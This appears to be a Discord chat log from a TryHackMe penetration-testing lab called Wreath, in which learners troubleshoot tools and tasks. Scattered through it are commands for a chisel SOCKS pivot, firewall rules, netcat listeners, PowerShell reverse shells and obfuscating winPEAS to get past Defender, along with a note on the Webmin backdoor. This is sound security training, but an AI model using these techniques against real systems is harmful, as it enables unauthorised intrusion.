Finished wreath today. Great work. Had a few minor issues with empire not running modules but just transferred the files instead. Learnt a lot for sure and hope more like this can come to try hack me. Windows is a fresh domain to me, and my next step in pen testing. Running winpeas isn’t enough to please me@

May have a few ideas for that 👀

Hey, I'm on the PC machine and I uploaded winpeas to the temp folder, and I tried to run del command on winpeas exe to do clean up. But the system says it can't find the said file. Why is this? Sorry for this simple question, but I couldn't figured it out. Network is great by the way, I enjoyed it a lot :)

are you as root

No

I thought if I can upload I can delete as well

or an escalated user, it depends on the user account that uploaded the file if you can see it

Do I need more privileges than the account I uploaded as to delete the same file I uploaded?

No, it was caught by defender and deleted automatically

It was obfuscated, I can still run it

Not sure if this already asked..Will this room available after 9apr?

Yes.

Great, thanks

Are there any problems? This evening all was working ok, but now I can't access the network. Destination Host Unreachable. I reloaded the vpn many times but still nothing.

Check that the network is still active?

Now it's working again.

Don't know what happened. Apparently it was running. Thanks anyway.

Thanks a lot for the amazing network, Muiri just completed it. Was super educational and fun at the same time

Congratulations. 🥳 Did you submit your Pentest Report? 😎

Hi, how can I delete the netcat binary in the temp directory when I am still connected through netcat?

It says access denied

Connect through a new ssh?

I see, thanks

Making one right now, and trying to structure it more properly

Im trying to set up a forward socks proxy to git-serv but im getting the following error:

*Evil-WinRM* PS C:\Users\Administrator\Documents> netsh advfirewall firewall add rule name="Chisel-bluemoon" dir=in action=allow protocol=tcp localport=8888
Ok.

*Evil-WinRM* PS C:\Users\Administrator\Documents> ./chisel.exe server -p 8888 --socks5
chisel.exe : 2021/03/27 00:22:05 server: Fingerprint DXdZdW4k0QztEjfKp2MMZLU6rrc6NZTl01ixlgS8LhQ=
    + CategoryInfo          : NotSpecified: (2021/03/27 00:2...ZTl01ixlgS8LhQ=:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2021/03/27 00:22:05 server: Listening on http://0.0.0.0:8888

@trail kite is that an error?

Or is it saying that it's listening?

(Also, what happened to only opening ports over 15000? 😛 )

i tried on different ports

i was first working on 28080 then 28888 then 18080 then 18888

lol

i think its an error but idk. im unable to get the socks to work

I mean, that's executing correctly

maybe im doing smtg wrong. let me retry. stand by

The command output you showed indicates that the listener is set up correctly

im getting this error tho

./chisel client 10.200.109.150 1337:socks
2021/03/26 20:43:43 client: Connecting to ws://10.200.109.150:80
2021/03/26 20:43:43 client: tun: proxy#127.0.0.1:1337=>socks: Listening
2021/03/26 20:43:43 client: Connection error: websocket: bad handshake
2021/03/26 20:43:43 client: Retrying in 100ms...
2021/03/26 20:43:43 client: Connection error: websocket: bad handshake (Attempt: 1)
2021/03/26 20:43:43 client: Retrying in 200ms...
2021/03/26 20:43:43 client: Connection error: websocket: bad handshake (Attempt: 2)
2021/03/26 20:43:43 client: Retrying in 400ms...
2021/03/26 20:43:44 client: Connection error: websocket: bad handshake (Attempt: 3)
2021/03/26 20:43:44 client: Retrying in 800ms...
2021/03/26 20:43:45 client: Connection error: websocket: bad handshake (Attempt: 4)
2021/03/26 20:43:45 client: Retrying in 1.6s...
2021/03/26 20:43:47 client: Connection error: websocket: bad handshake (Attempt: 5)
2021/03/26 20:43:47 client: Retrying in 3.2s...
2021/03/26 20:43:50 client: Connection error: websocket: bad handshake (Attempt: 6)
2021/03/26 20:43:50 client: Retrying in 6.4s...
2021/03/26 20:43:56 client: Connection error: websocket: bad handshake (Attempt: 7)
2021/03/26 20:43:56 client: Retrying in 12.8s...

i do have sshutte

You haven't specified the port to connect to there

./chisel client 10.200.109.150:8888 1337:socks

oh yeh

*18888 🤪

It was 8888 here?

Whichever though 🤷‍♂️

well i changed it 🙂

cause im a good boy 😉

Preferably 18888 because it doesn't screw it for other people 🙂

ok it works now. thanks for the help. although i didnt get #wreath-network message error previously, i got a different error in ff, but i probs just misconfigured smtg

thanks for the help!

Np 😄

also thx for making this network. ive been working the last week to keep up a streak (this is my second longest lol after AoC lol)

also, i realized why it wasnt working initially. i was trying to connect a socks forward to socks backwards

😐

quick question, can i get foxyproxy to only run certain subnets through the proxy or no?

Yes, although I think that's just in foxyproxy standard

so like not the extension?

Different extension

would u recommend it and if so can u send the link so i dont download a virus 😅

I'm pretty sure there's a link in the room?

Or not

https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

did someone disable port 22 and 10000 from the first machine?

I cant access neither

can we reset it?

Remember, there are lots of instances of wreath. If you want other people on your ne twork to reset it, you need to specify which network you're on. The third octet.

Check that your network is still active 🙂

My PC is off so there isn't much I can do to debug

its the .200 one

That's the fourth octet

.112

Check that it's still active. Otherwise go for a reset

If it's an actual problem then others will no doubt help

I went for a reset

2/6 votes

I really cant do anything at all until it gets reset

Hello.... it’s me again.... after yesterday... I could set up the nc.... but now after running
./nc-tzipi -lvpn 16543 (16543 is the port I used for the firewall) ... haha.. 😖nothing happens 😖

I watched the walkthrough video and it seems I’ve done everything correctly up to now .... but the
PC C:\Gitstack\gitphp>
Prompt never comes 😢

And another thing.... while I wait for precious help on the issue above, I went ahead and tried to install empire here.... to find out Parrot OS is not supported 😳

1. Have you tried typing a command?
2. I have already installed Empire on parrot

Tried starting it and it says unsupported OS, closes right on my face

does anyone know why my command wont run?

the dir command works but not systeminfo

u can try to install in with docker perhaps?

I’ll google and see how I do that!

https://github.com/BC-SECURITY/Empire#docker

For me building for source worked

But the gitserv agent after connection established just died

Had same issue with powershell Rev shell

YAAAAAAAY!!!!!!!!!!!!!! Thank you so much 😊

Installed Starkiller too （╹◡╹）now if I only can get this nc to work, I’m ready to continue, hopefully lol

Big thank you to @trail kite for pointing me in the right direction! 😊

Im unable to reach https:thomaswreath.thm even after updating etc/hosts file
I have tried it in different OS (Kali & windows ) ,different browsers but nothing happens

Are you connected to the wreath network? Can you ping the ip?

Hi.. I always get "An unexpected network error occurred" whenever I try to move system.bak file to my machine but moving sam.bak works fine...

I am get a HTTPClient::ConnectTimeoutError happened with the admin or with my only login info using evil-winrm.

I'm wondering if that might be your MTU in the VPN, give the system.bak file is pretty big.
Did things like the chisel upload work for you?

That sounds like the network isn't up, or you don't have access to the port

yeah everything worked fine.... it's just copying the file is a challenge now.

It sounds like the VPN, tbh.
If you want, I can just send you the file?

That will be perfect..Please do..

Yes I’m connected to wreath network and I can ping the ip

What happens when you just go to the IP in your browser?

It shows the connection has timed out

Do you have a VPN on @undone bobcat?

No

But you have the Wreath VPN on, yes?

Yes

I have connected using openvpn

Ok, could you disconnect and DM me the .ovpn file please?

Yeah I will 1 min plzz

so i turns out this one is a slightly different version than the one linked in the room...

but thx, this one is better imo

@merry robin Hello.... it’s me again.... after yesterday... I could set up the nc.... but now after running
./nc-tzipi -lvpn 16543 (16543 is the port I used for the firewall) ... haha.. 😖nothing happens 😖

i think its a dumb question but i was doing task 14 do i have to do same stuff thats is in task on the machine or i have to read them and answer the question

Nope

I'm trying to do the network again

First machine still not working

We HAVE to vote for the reset

otherwise its gonna stay broken because no one is fixing it

Has been broken since yesterday

Ok but remember there's several instances of the network. If you're pushing people to reset, you NEED to say which one you're on.

.112

Was that not the point?

Make sure that the firewall is still open from yesterday 🙂

??

Wdym?

@limber rover is everything Ok with 112?

I'm on .112 too, but I'm on Task 10

Can you access the webmin on the first machine tho?

I have an ssh session to it

using the id_rsa

let me try webmin

yep

webmin is working

And the webserver?

up

10.200.112.200 right?

Everything is functional 🤷

@latent spoke @strange bison

still

Ok.

Hmm?

it's working.

let me check the ssh

gonna try regenerating the vpn

thing is, everything else apart from SSH and the Webmin port works

Just curious have you added the domain name to /etc/hosts shouldn't change anything but still

the thomaswreath.thm entry?

yeah

I'm on the same machine as you are and it's working for me

Gonna regen the vpn

if you want I can leave you a revshell 🙃

Yes please, or just the simple-backdoor.php from webshells

I'm already at 63% done, I dont know why this is happening to me

I'll use the php-reverse-shell.php one?

Can you give me the IP and the port you're listening on?

sure

1 sec

I'll upload the rev shell to the web root

wait no

never mind

figured out what it was

ooh did it work?

1178 lines of readme.md later, im done 🙃

yup, NordVPN was blocking it for some apparent reason

I just turned off my vpn XD

SORRYYYY

Don't run VPNs in VPNs.

xD

I mean, it has worked with Proving Grounds vpn

idk why it didnt in this one

Thanks for the help tho

Anyone know why can't we use UDP scans when pivoting using proxychains? This is in regard to task 10.

You can only use TCP scans -- so no UDP or SYN scans. ICMP Echo packest (Ping requests) will also not work through the proxy, so use the -Pn switch to prevent Nmap from trying it.

proxychains doesn't support UDP it seems

Ain't it because proxychains forces TCP only?

interesting, you're corect James.

Now we can proxify any program. To check if it is working fine, we can run a Nmap scan to the target machine. Note that proxychains allows only TCP tunneling, so we can’t use UDP communications . We can simply force Nmap not to perform ping scans with the option –PN. Let’s then run the following command and see if we are able to scan the target:

~ https://blog.elearnsecurity.com/nessus-and-metasploit-scan-networks-in-pivoting.html

That's interesting, will need to take a look at this later 👀

interesting, you're corect James. you say that like it's uncommon. I googled it before asking because I suspected it didn't support UDP

haha, that interesting wasn't meant in that sense 😄

it was more about reversing proxychains later on 😈

Hi, @merry robin
I have an issue, the ||/resources|| won't load after I entered credentials on the .106
Can you help me plz ? Thanks

You sure you have the right credentials @compact island?

yes

And the page is loading

ow

sorry

I'm a idiot xD I was thinking that was Thomas and the password twreath

Heh, second time I've seen that. Don't worry

Ok, Thanks

nuuuuuuuuuuu network reseeeeeeettt

reeeeee

sad day

Weren't you the one who cast the first vote?

task 6 reference [1] link broken ?

Works for me?

hm. might be my connection/network. odd

i have a question, it says that i have 5 days of access left, i still haven't really done anything in the room just a few questions. will my access be revoked after 5 days or can i still access it?

You'll have to rejoin

But there are no requirements for that rejoin.

and the progress?

Kept.

alrighty. thanks

Obviously if the network is reset you'll need to do a bunch of stuff again because your files and stuff will be gone

understood.

#documentation

Hm?

yes but it eventually started working, was almost done

The current record is 30 seconds from starting sshuttle to RDP on .100

See if you can beat it

Muir- is there possibly a bug in your github exploit code? Line 117-121 should be indented, inside the catch exception block?

or am I reading this wrong?

Anyone have or had issues on task 20?

Able to post commands via curl and burp....no luck with a shell....unless my syntax is off someplace....idk

Nah -- by that point it's a separate condition

What's the error?

Returns " "

Via curl

I feel like my syntax is not right

That would indicate that it's trying to connect back, and isn't

What command are you using?

Powershell.exe -c ..........

As in, full curl command?

Substitute the payload with SNIP or something

Hello, when pivoting from the first box to the second one (using the netcat method) I've tried opening up port 42069 ( 😏 ) on box1, but when the box2 connected to me, it closed immediately the connection, so then i've tried using port 16001 and it worked perfectly 🙂

Same one you are usng in guide

Did you URL encode it?

I did

On 2 seperate sites... just in case

What are you using to catch it?

Netcat

But then again, ports im using might be taken?!

Ill try again later. Its no biggie Muir.

Make sure the firewall is set up for it

Initially i forgot to allow said ports...

Ill give it a rest and maybe do a reset later. Thank you for the reply!

I will chuck you out Cryillic

I saw it....👀

you cant oppress superiority

Good think I'm not oppressing superiority then

I'm just oppressing you

so I started digging into how the webmin backdoor was installed. They say it was in part because the file's timestamps were modified to not show up in a git diff. But doesn't git diff based on file hashes, NOT timestamps?

even back in 2018?

This module exploits a backdoor in Webmin versions 1.890 through 1.920. Only the SourceForge downloads were backdoored, but they are listed as official downloads on the project's site. Unknown attacker(s) inserted Perl qx statements into the build server's source code on two separate occasions: once in April 2018, introducing the backdoor in the 1.890 release, and in July 2018, reintroducing the backdoor in releases 1.900 through 1.920. Only version 1.890 is exploitable in the default install. Later affected versions require the expired password changing feature to be enabled. - I don't think git was involved at all?

on https://www.webmin.com/exploit.html:
At some time in April 2018, the Webmin development build server was exploited and a vulnerability added to the password_change.cgi script. Because the timestamp on the file was set back, it did not show up in any Git diffs. This was included in the Webmin 1.890 release.

I would suspect that if you set it to a timestamp before the last commit, git would still use the last commit to compare hashes. i.e. it would ignore your commit and use the hash for the latest one (the legitimate one)

if I do a git diff locally, wouldn't git be checking file hashes, not timestamps?